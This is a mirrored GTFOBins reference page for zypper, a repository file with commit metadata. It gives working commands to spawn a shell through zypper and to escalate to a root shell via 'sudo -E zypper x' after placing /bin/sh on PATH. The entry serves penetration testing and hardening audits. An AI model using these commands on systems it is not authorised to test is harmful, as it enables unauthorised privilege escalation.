This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-03 14:21:40 +01:00
Code
Issues
cf9b07bf7b
GTFOBins.github.io
/
_gtfobins
/
zypper.md
the-remmer
8c03983ab8
Add zypper
...
Close
#52
.
2019-02-22 12:51:30 +01:00
629 B
Raw
Blame
History
functions
shell
sudo
description
code
This requires `/bin/sh` to be copied to `/usr/lib/zypper/commands/zypper-x` and this usually requires elevated privileges.
zypper x
code
TF=$(mktemp -d) cp /bin/sh $TF/zypper-x export PATH=$TF:$PATH zypper x
description
code
This requires `/bin/sh` to be copied to `/usr/lib/zypper/commands/zypper-x` and this usually requires elevated privileges.
sudo zypper x
code
TF=$(mktemp -d) cp /bin/sh $TF/zypper-x export PATH=$TF:$PATH sudo -E zypper x